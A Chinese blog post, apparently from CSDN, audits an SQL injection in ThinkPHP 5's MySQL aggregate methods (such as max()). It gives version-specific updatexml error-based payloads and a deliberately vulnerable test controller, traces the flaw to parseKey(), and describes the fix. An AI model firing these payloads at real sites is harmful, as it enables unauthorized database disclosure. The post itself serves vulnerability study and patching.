ThinkPHP5代码审计【聚合函数引起的SQL注入】

最新推荐文章于 2024-08-12 09:22:05 发布
最新推荐文章于 2024-08-12 09:22:05 发布
阅读量339 收藏 2
点赞数
分类专栏: 代码审计
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/116566732
版权

文章目录

简介

Mysql 聚合函数相关方法均存在注入

本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。

漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。

Payload IN :5.0.0~5.0.21 、 5.1.3~5.1.10

id)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23

Payload IN :5.1.11~5.1.25

id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23
环境搭建

composer下载源码:

composer create-project --prefer-dist topthink/think=5.1.25 thinkphp_5.1.25

配置 application/index/controller/Index.php为以下代码:

<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        $options = request()->get('options');
        $result = db('users')->max($options);
        var_dump($result);
    }
}

配置composer.json:
在这里插入图片描述
在config/database.php下配置数据库
在这里插入图片描述
在config/app.php开启调试
在这里插入图片描述
然后去GitHub上下载thinkphp目录并将其代替我们composer下载的thinkphp目录,下载地址:
https://github.com/top-think/framework/archive/refs/tags/v5.1.25.zip

分析

正常地传入id,即MAX(`id`)了,看到确实会返回正确的值:

在这里插入图片描述
尝试闭合一下MAX(`id`),加一个反引号、一个括号、一个报错语句、一个注释符,发现我们的请求没有被拦截而直接成功触发SQL注入了:

payload
?options=id`) and updatexml(1,concat(0x7e,user(),0x7e),1)from users%23

在这里插入图片描述


分析一下其中的原因:
前面的不讲了,直接看max()方法,会调用aggregate()方法
在这里插入图片描述
Connection类下的aggregate()方法:先经过了一个拼接,然后会进入value()方法
在这里插入图片描述
经过一个拼接得到的$field=

MAX(`id`) and updatexml(1,concat(0x7e,user(),0x7e),1)from users#`) AS tp_max

然后看value(),其中最重要的就是生成SQL语句处:
在这里插入图片描述
Builder类下的select方法:重点看对字段的处理,也就是重点看$this->parseField($query, $options['field']),
在这里插入图片描述
这个parseField方法主要执行下面这些代码:

protected function parseField(Query $query, $fields)
{
	.......
        foreach ($fields as $key => $field) {
			else {
                $array[] = $this->parseKey($query, $field);
            }
        }
    ......
        $fieldsStr = implode(',', $array);
    return $fieldsStr;

$field数组的值逐个传入parseKey中检查,然后再往$array中添加值,$array数组以逗号合并起来,得到$fieldStr
在这里插入图片描述
上述的parsekey方法来自Mysql类下的parsekey方法,会对字段名进行检查,其中有一处不满足正则就加反引号的代码,不过这对我们的上面$fields数组中的值没有影响,因为都不满足那个正则
在这里插入图片描述

所以最终$fieldsStr的值为

MAX(`id`) and updatexml(1,concat(0x7e,user(),0x7e),1)from users#`) AS tp_max

从而得到SQL语句:

SELECT MAX(`id`) and updatexml(1,concat(0x7e,user(),0x7e),1)from users#`) AS tp_max FROM `users` LIMIT 1

到这儿就大致完成了,可以看见SQL语句就是我们想要的

可以看到关键是Mysql类下对字段名检查的parseKey()方法 没有严格过滤导致我们的语句能组成起来



七月火师傅的攻击流程图
在这里插入图片描述

修复

在Mysql类parseKey()方法中,添加一段过滤代码,不允许出现除了 字母、点号、星号 以外的字符时,否则就抛出异常。

在这里插入图片描述

D.MIND
关注
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1701
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
代码审计-Thinkphp框架审计前置知识点
xiaoheizi的博客
08-10 889
使用thinkphp框架的源码审计思路: 1.使用源码查看工具打开源码,全局搜索thinkphp确认源码是否使用thinkphp框架 2.源码如果没有按照thinkphp框架的代码规则来,则不会触发thinkphp框架的过滤规则。按照常规思路测试即可 3.源码如果是按照thinkphp框架的代码规则来的,则全局搜索THINK_VERSION确认框架版本信息,根据版本漏洞来测试。否则相当于在测试框架的0day。
ThinkPHP5代码审计【RCE】
D.MIND 的博客
05-14 1245
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
tp5 代码执行代码审计
最新发布
usingnstd的博客
08-12 378
tp5代码执行漏洞复现
ThinkPHP5代码审计【变量覆盖引起的文件包含】
D.MIND 的博客
05-10 270
文章目录简介环境搭建分析修复 简介 本次漏洞存在于 ThinkPHP 模板引擎,在加载模版解析变量时存在变量覆盖问题,而且程序没有对数据进行很好的过滤,最终导致 文件包含漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。 环境搭建 composer create-project --prefer-dist topthink/think=5.0.18 thinkphp_5.0.18 修改json文件
ThinkPHP5之文件包含审计分析(五)
Jeromeyoung
01-06 682
这个漏洞个人认为文件包含是小事,因为重点是在最后的变量覆盖。而且那条代码还是一个经典的变量覆盖漏洞案例。如果是从审计来看,定位到extract函数,注意到这里设置了EXTR_OVERWRITE,那么只要第一个参数可控就可以完成变量覆盖了,include只是完美利用了变量覆盖这个功能。全局搜索也是很容易搜到调用位置的,这里有两处,另外一处是display方法,试了下也是可以完美利用的,它在调用View类下的fetch方法的时候会传入。
有关ThinkPHP框架的审计
糖小喵
03-14 804
ThinkPHP简介 ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方...
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
官方文档提到,通过查询条件预处理能够有效防止SQL注入,因为预处理会将SQL语句与参数分离,由数据库系统先进行编译,再将参数传入,从而避免了动态执行恶意构造的SQL代码。但是,如果使用ThinkPHP的API时采用了...
tp5防止sql注入mysql_【漏洞分析】ThinkPHP 5.0版本 SQL注入漏洞分析
weixin_34954140的博客
01-30 993
阅读:6,774前段时间,ThinkPHP发布了V5.0.16版本的release,该版本提到了安全更新。本篇文章以此次安全更新入手,对ThinkPHP 5.0版本 SQL注入漏洞进行了详细分析。文末还有测试小问题,看看大家get到这个漏洞的精髓了吗?前言Thinkphp V5.0.16版本的release说明如下:说明提到了安全更新,但并没有提到是什么安全问题。V5.0.16的commits记...
thinkPHP5框架闭包函数与子查询传参用法示例
01-02
本文实例讲述了thinkPHP5框架闭包函数用法。分享给大家供大家参考,具体如下: 普通使用 举个栗子: $this->where(function ($query) { $query->where('id', 1)->whereor('id', 2); })->find(); 上述栗子就是一个...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链1
08-03
ThinkPHP v3.2.X 反序列化漏洞与SQL注入及文件读取利用分析》 ThinkPHP是一款广泛使用的PHP框架,其3.2.*版本存在反序列化漏洞,允许攻击者通过精心构造的数据包触发特定行为,如SQL注入和文件读取。本文将深入...
ThinkPHP 5.0.24 核心版
11-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的,ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出
php代码审计框架之thinkphp
温和的跳跃
12-22 335
我先挖坑,最近打算学习一下thinkphp 代码审计真的是 看得懂代码的找不到利用方式 看不懂的那真的是看不懂。为什么能整出这么多框架。sun a dog 但是呢还能怎么办,当然是原谅它,继续学,知识进一寸得一寸欢喜。不怕真理无穷。 速度速度速度 ...
记一次ThinkPHP源码审计
06-29 3051
转载自:http://ecma.io/724.html 一、在前面 周末闲得蛋疼,审了一套朋友给的系统,过程挺有意思的,开始的时候觉得基于TP3.0二次开发的系统应该是蛮简单的,毕竟TP爆了很多漏洞。后来发现开发做了不少安全措施。因此记录一下这次审计,当时自己学习的记录吧。 二、后台注入 最开始的时候,因为快吃饭了,就用RIPS扫了扫(事实证明,没有什么毛用)。说是扫到了一个
学习笔记-ThinkPHP5漏洞分析之SQL注入(四)
人饭子的博客
11-09 1132
ThinkPHP5漏洞分析之SQL注入(四) 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。 不同版本 payload 需稍作调整: 5.0.0~5...
ThinkPH5 SQL注入(Mysql 聚合函数
LYJ20010728的博客
08-14 442
ThinkPH5 SQL注入(Mysql 聚合函数)漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于所有 Mysql 聚合函数相关方法,由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生 漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 初始配置 获取测试环境代码 composer create-project --prefer-d
ThinkPHP 5.0.x 框架sql注入漏洞分析
Fly_鹏程万里
12-11 2845
前言 漏洞复现 搭建好数据库,以我自己的配置为例。数据库为tptest,表名为user,其有两个字段id和username thinkphp官网下载5.0.15版本: http://www.thinkphp.cn/down/1125.html 。修改数据库配置信息 application/database.php。在 application/config.php 打开调试和tra...
ThinkPHP学习笔记(一)--下载ThinkPHP源代码并安装
limingliang_的博客
02-17 2723
ThinkPHP官网下载《ThinkPHP5.0.24完整版》 然后解压到自己的电脑,解压后的文件夹路径如下: 在此之前需要安装PHPstudy,将PHPstudyD:\phpStudy\PHPTutorial\WWW下的phpMyAdmin拷入上述的文件夹下 然后建立一个仓库便于代码管理,最终文件夹的文件如下: ...
ThinkPHP5.0.15代码审计SQL注入
D.MIND 的博客
05-04 579
文章目录环境搭建分析payload:修复 环境搭建 到composer.json填版本 到application/index/controller/Index.php配置: public function index()//控制方法 { $username = request()->get('username/a'); db('users')->insert(['username'=>$username]); return 'Update success'; }
ThinkPHP3.2.3 SQL注入分析:update注入详解
在IT安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过输入恶意的SQL代码来操纵数据库。这篇关于"think3.2.3_sql注入分析1"的文章聚焦于ThinkPHP 3.2.3版本存在的一个SQL注入漏洞。ThinkPHP是一个广泛使用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值